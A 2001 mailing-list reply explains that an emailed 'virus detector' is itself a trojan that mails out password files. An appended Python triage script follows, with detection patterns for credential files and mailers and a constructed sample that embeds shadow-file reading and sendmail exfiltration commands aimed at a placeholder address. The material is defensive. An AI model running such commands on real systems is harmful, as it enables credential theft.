
Re: OT - Virus?



On Wed, Jan 03, 2001 at 11:39:10AM -0600, John Travis wrote:
> I know this is a little OT but this is about the only forum where I
> provide the email address that the message in question was received from.
> And besides, you gurus should be able to straighten this out :-).  I just
> got an email (not at this address) warning of a GNU/Linux virus named LinX
> that is _supposedly_ going to destroy my shadow password file next month.

such a virus would have to be running as root to destroy your shadow
file.  so you would have had to already have installed a trojan as
root. 

> It contained an executable that was supposed to scour your computer and
> determine if you were infected.  But upon looking at it in an editor

yeah i'll bet it did.  i'm sure you must run it as root for it to
function correctly right?  sounds like a classic trojan to me. 

> certain things just look bad.  It looks like it starts a file with the
> contents of ls, then cats your password files on, then tries to initiate a
> net connection and sendmail the file to an address at yahoo.com?  Now I've
> been up for a *long* time, so maybe I'm just being paranoid.  I know the
> files would be encrypted anyway, just curious.  So has anyone else heard of
> this would-be virus?

sounds to me like the virus is nothing more than a ruse to try and
convince you to run this so called scanner, this scanner then either
installs this so called virus itself or does some other evil (mailing
your shadow file to someone for example, or adding extra root
accounts, tampering with sshd, login, telnetd etc etc).  

if i haven't made myself clear i believe your `detector' *IS* the
trojan.  never ever run unknown/untrusted binaries for which you do
not have the source. *especially* as root.  

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
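
The behaviour discussed in this thread was spotted by reading the file in an editor instead of running it. That inspection can be scripted; the following is an added example, not part of the original message, and its indicator patterns, function names and sample bytes are constructed for illustration.

```python
import re

# Indicator patterns for the behaviour described in the thread: reading
# password files, handing data to a mailer, an embedded external address.
INDICATORS = {
    "credential_file": re.compile(rb"/etc/(shadow|passwd|master\.passwd)\b"),
    "mail_transport": re.compile(rb"\b(sendmail|mailx?)\b"),
    "email_address": re.compile(rb"[\w.+-]+@[\w-]+(\.[\w-]+)+"),
    "file_concat": re.compile(rb"\bcat\b.*>>?"),
}

def printable_strings(blob, min_len=4):
    """Yield runs of printable ASCII, like strings(1); nothing is executed."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.group()

def triage(blob):
    """Return {indicator_name: [matching strings]} for a file's raw bytes."""
    hits = {}
    for s in printable_strings(blob):
        for name, pat in INDICATORS.items():
            if pat.search(s):
                hits.setdefault(name, []).append(s.decode("ascii"))
    return hits

def looks_like_exfiltration(hits):
    """Credential file access plus a way to mail data out is the red flag."""
    return "credential_file" in hits and (
        "mail_transport" in hits or "email_address" in hits)

# Constructed sample: bytes imitating a binary that embeds shell commands.
SAMPLE = (b"\x7fELF\x01\x01\x00\x00\x00ls -la > /tmp/.out\x00"
          b"cat /etc/passwd /etc/shadow >> /tmp/.out\x00\x03\x02"
          b"sendmail collector@example.invalid < /tmp/.out\x00\xff\xfe")

if __name__ == "__main__":
    found = triage(SAMPLE)
    for name, strings in sorted(found.items()):
        print(name, strings)
    print("exfiltration pattern:", looks_like_exfiltration(found))
```

A clean result proves nothing, since strings can be packed or obfuscated; a hit is enough reason not to run the file.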
